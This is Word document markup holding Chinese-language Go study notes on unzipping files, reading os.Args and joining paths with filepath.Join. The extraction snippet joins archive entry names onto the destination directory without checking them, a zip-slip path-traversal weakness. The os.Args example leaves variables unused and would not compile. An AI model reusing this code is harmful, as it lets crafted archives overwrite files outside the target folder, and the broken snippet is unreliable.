      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">if err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>os.MkdirAll(path, file.Mode());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187D1B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328503F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F5F432" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为是目录，跳过当前循环，因为后面都是文件的处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA5F75B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F4C0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE58170" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3830C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fr, err := file.Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE749A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1600C9CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374ACAB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F9104" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建要写出的文件对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B2BAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fw, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR|os.O_TRUNC, file.Mode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E479B42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C2625" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF013F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A98E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>io.Copy(fw, fr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208121B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fw.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB8740" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fr.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61707C63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360CF83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24059D7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0677E0DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFA3BF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">os.Args: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单的处理传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDAC5EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE7D71C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7534280F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1ADF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB2FB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5851B992" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249042F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5632595D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B19E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">args := os.Args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取用户输入的所有参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D99F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F47A963" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    one := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>args[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取输入的第一个参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A17F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    two := args[2]  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取输入的第二个参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB5AF14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A5807" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DFBC24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7041825F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3379CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="324" w:name="_Toc159779781"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
    </w:p>
    <w:p w14:paraId="7DD3F6D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B1D313" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>path/filepath.Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：拼接文件路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB5DA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "path/filepath"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454418F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607ECB5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_, err = os.Stat(filepath.Join(ZipDestFileDir, ".git"))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>if os.IsNotExist(err) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>no_git = "--no-git"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>} else {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>no_git = ""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CB6DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490FC401" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDF291C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>path := filepath.Join(dst, file.Name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183913B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B5B608" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>如果是目录，就创建目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36154259" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if file.FileInfo().IsDir() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F2A52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if err := os.MkdirAll(path, file.Mode()); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276B66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4FF934" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13180EDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>因为是目录，跳过当前循环，因为后面都是文件的处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF1F5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262D58E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A766DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452190DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BF4CB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEE1D68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EB0954" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D1C099" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="_Toc159779782"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bufio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w14:paraId="7DD66254" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24872BED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
